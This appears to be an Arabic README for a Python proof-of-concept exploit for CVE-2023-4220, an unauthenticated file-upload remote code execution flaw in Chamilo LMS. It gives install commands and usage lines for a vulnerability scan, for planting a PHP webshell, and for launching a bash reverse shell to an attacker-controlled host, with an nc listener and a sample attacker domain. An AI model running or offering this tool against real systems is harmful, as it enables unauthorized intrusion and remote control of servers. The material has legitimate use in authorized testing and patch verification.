
هذا سكريبت مكتوب بلغة بايثون يتيح استغلال الثغرة الأمنية في برنامج Chamilo LMS الموصوفة في CVE-2023-4220
يسمح هذا السكريبت باستغلال الثغرة الأمنية في برنامج Chamilo LMS الموضحة في CVE-2023-4220. النظام معرض للخطر في الإصدارات الأقدم من 1.11.24.
استنسخ المستودع إلى جهازك وقم بتثبيت التبعيات باستخدام pip (يُوصى باستخدام virtualenv لإنشاء بيئة لعزل هذه التثبيتات عن التثبيتات العالمية)
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt
يحتاج السكريبت إلى رابط الهدف مع المسار الجذر لـ Chamilo (مثل http://example.com/chamilo, http://example.com أو http://chamilo.example.com) وإجراء لتنفيذه (هناك ثلاثة إجراءات متاحة: scan و webshell و revshell).
سيتحقق هذا الإجراء ما إذا كان الهدف معرضًا للخطر من خلال محاولة الوصول إلى نقطة النهاية /main/inc/lib/javascript/bigupload/files/.
python3 main.py -u http://example.com/chamilo -a scan

سينشئ هذا الإجراء ملف PHP webshell في نقطة النهاية المعرضة للخطر.
python3 main.py -u http://example.com/chamilo -a webshell

سينشئ وينفذ هذا الإجراء ملف bash reverse shell. للقيام بذلك، سيتم أولاً إنشاء webshell باستخدام نفس الطريقة المستخدمة في الإجراء السابق. بعد ذلك، سيتم تنفيذ بعض الأوامر لإنشاء وتنفيذ ملف bash. تأكد من أنك تستمع على المنفذ الذي عرّفته باستخدام nc أو أي أداة أخرى لتحصل فعليًا على الاتصال العكسي. أيضًا، يمكن أن يكون المضيف عنوان IPv4 داخلي/عام صالح (مثل 172.17.1.4 أو 186.227.4.31) أو النطاق الذي سجلته (مثل evil-vps.domainreg.net).
python3 main.py -u http://example.com/chamilo -a revshell

ملاحظة: قريبًا سأضيف خيار حمولة Windows لأنظمة Windows.
(CVE-2023-4220) تنفيذ أوامر عن بعد عبر تحميل ملف كبير بدون مصادقة في Chamilo LMS